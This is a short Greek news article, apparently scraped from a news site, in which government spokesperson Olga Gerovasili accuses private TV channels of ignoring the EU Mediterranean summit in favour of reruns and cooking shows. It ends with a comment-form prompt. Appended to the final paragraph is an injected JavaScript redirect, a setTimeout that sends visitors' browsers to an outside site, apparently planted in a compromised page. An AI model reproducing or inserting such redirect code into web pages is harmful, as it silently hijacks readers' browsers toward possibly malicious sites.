«Οργή» Γεροβασίλη: Τα κανάλια δεν έδειχναν τη Σύνοδο, αλλά εκπομπές μαγειρικής

0
7

 

Την «οργή» της κυβερνητικής εκπροσώπου Όλγας Γεροβασίλη προκάλεσε η τηλεοπτική δημοσιογραφική κάλυψη της Ευρωμεσογειακής Συνόδου από τα ιδιωτικά κανάλια.

«Η Σύνοδος Μεσογειακών Κρατών της Ε.Ε., η οποία βρέθηκε στο επίκεντρο του διεθνούς ενδιαφέροντος, μάλλον δεν αποτελεί σημαντική είδηση για τους ιδιωτικούς τηλεοπτικούς σταθμούς, αφού, προφανώς, δεν είναι συμβατή με την εικόνα καταστροφολογίας, που συστηματικά προβάλλουν για τα πεπραγμένα της κυβέρνησης», δήλωσε η κα Γεροβασίλη και παρατήρησε ότι «κανένας ιδιωτικός τηλεοπτικός σταθμός δεν διέκοψε το πρόγραμμά του για να προβάλλει τις δηλώσεις δύο προέδρων Δημοκρατίας και τεσσάρων πρωθυπουργών».

«Προφανώς αντίθετη άποψη είχαν οι 226 διαπιστευμένοι δημοσιογράφοι και τεχνικοί, από τους οποίους οι 145 από ξένα ΜΜΕ, που βρέθηκαν στο Ζάππειο για την κάλυψη της Συνόδου, η οποία είχε ισχυρότατο διεθνή αντίκτυπο. Φαίνεται ότι τα ιδιωτικά κανάλια έχουν διαφορετική αντίληψη για το ποιο γεγονός είναι άξιο μετάδοσης και ποιο όχι, και προτίμησαν να παίζουν επαναλήψεις και εκπομπές μαγειρικής», ανέφερε η κυβερνητική εκπρόσωπος.

«Δημοκρατία, κοινωνική συνοχή, αλληλεγγύη και ανάπτυξη είναι η μόνη απάντηση στην Ευρώπη που συνθλίβεται ανάμεσα στην λιτότητα και την ακροδεξιά», ήταν και το μήνυμα του ΣΥΡΙΖΑ που αναρτήθηκε στα κοινωνικά δίκτυα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here